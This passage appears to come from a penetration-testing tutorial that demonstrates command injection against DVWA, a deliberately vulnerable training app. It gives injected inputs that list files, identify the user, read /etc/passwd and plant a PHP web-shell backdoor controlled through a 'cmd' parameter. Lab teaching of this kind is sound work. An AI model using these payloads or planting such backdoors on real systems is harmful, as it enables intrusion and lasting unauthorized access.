Command-injection vulnerabilities allow an attacker to inject commands into poorly-validated user input. This input is used in used in some form by the system shell and in the process, the command injected gets executed on the system.
One case where you may find this is an application that takes user input, for example a username or email address, and creates a folder on the system that's used to house that user's data, file uploads, and so on.
In our target system, DVWA, there is a page that is used to demonstrate this flaw by exploiting user input that is passed to the system ping command. Let's log in to DVWA again on the OWASP Broken Apps VM and select command injection from the menu on the left:
As stated before, this input is passed to the ping command, which should be an IP Address. We can confirm this by passing 127.0.0.1:
We get the expected result. Now, let's try to pass another command into this input. We know that this application is being hosted on Linux. To join commands in Linux, we can use && between the commands.
With &&, the previous command must complete successfully before the following command gets executed. ; will execute the command whether or not the previous completed successfully. Let's try it with a basic ls command. In the input box, enter 127.0.0.1; ls and then click Submit:
Now we've confirmed that the input is not validated before it is processed, as the lines after the ping statistics show us the files of the current directory. We can expand on this and get the current directory we're in and what user is executing the commands. Enter 127.0.0.1; pwd; whoami:
From our results, we see that we're currently in the /owaspbwa/dvwa-git/vulnerabilities/exec directory and we're executing the commands as the www-data user. Now let's try to print the contents of a file, specifically the /etc/passwd file. In the input field, enter 127.0.0.1 and cat /etc/paswd:
This snippet should look like the results from our earlier LFI.
Let's do one more thing. Let's create a file in the directory and we can always refer to this later to execute commands. Enter 127.0.0.1 and echo “<?php system($_GET[‘cmd’]) ?>” > backdoor.php. This should create a PHP file with the name backdoor and the PHP code inside should be system ($_GET[‘cmd’]).
Now, in the browser, navigate to <ip address>/dvwa/vulnerabilities/exec/backdoor.php.
The page loads, however, nothing is displayed. This is because we have not passed any commands yet. Looking at what we type, in single quotes we have cmd. This is our variable that stores the command we would like to execute and passes it to the system for execution. To execute a command, after backdoor.php in the address bar, enter ?cmd= and then your command. I'll use ls as a basic demo:
Use your imagination from this point to try different possibilities. Admittedly, the presentation needs a bit of work, but you can always view the source code to clean it up:
I would add that you can use the Repeater in Burp Suite to do these steps and you can also use Burp Suite in conjunction with sqlmap and Metasploit to get a meterpreter shell.